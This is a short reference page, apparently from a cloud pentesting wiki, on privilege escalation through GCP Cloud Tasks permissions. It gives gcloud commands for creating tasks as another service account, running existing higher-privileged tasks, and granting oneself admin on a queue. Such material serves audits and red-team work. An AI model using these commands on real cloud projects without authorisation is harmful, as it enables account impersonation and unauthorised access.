GCP - Cloud Tasks Privesc

Reading time: 3 minutes

Cloud Tasks

cloudtasks.tasks.create, iam.serviceAccounts.actAs

An attacker with these permissions can impersonate other service accounts by creating tasks that execute with the specified service account's identity. This allows sending authenticated HTTP requests to IAM-protected Cloud Run or Cloud Functions services.

gcloud tasks create-http-task \
  task-$(date '+%Y%m%d%H%M%S') \
  --location us-central1 \
  --queue <queue_name> \
  --url 'https://<service_name>.us-central1.run.app' \
  --method POST \
  --header 'X-Hello: world' \
  --body-content '{"hello":"world"}' \
  --oidc-service-account-email <account>@<project_id>.iam.gserviceaccount.com

cloudtasks.tasks.run, cloudtasks.tasks.list

An attacker with these permissions can run existing scheduled tasks without having permissions on the service account associated with the task. This allows executing tasks that were previously created with higher privileged service accounts.

gcloud tasks run projects/<project_id>/locations/us-central1/queues/<queue_name>/tasks/<task_id>

The principal executing this command doesn't need iam.serviceAccounts.actAs permission on the task's service account. However, this only allows running existing tasks - it doesn't grant the ability to create or modify tasks.

cloudtasks.queues.setIamPolicy

An attacker with this permission can grant themselves or other principals Cloud Tasks roles on specific queues, potentially escalating to roles/cloudtasks.admin which includes the ability to create and run tasks.

gcloud tasks queues add-iam-policy-binding \
  <queue_name> \
  --location us-central1 \
  --member serviceAccount:<account>@<project_id>.iam.gserviceaccount.com \
  --role roles/cloudtasks.admin

This allows the attacker to grant full Cloud Tasks admin permissions on the queue to any service account they control.

References

• Google Cloud Tasks Documentation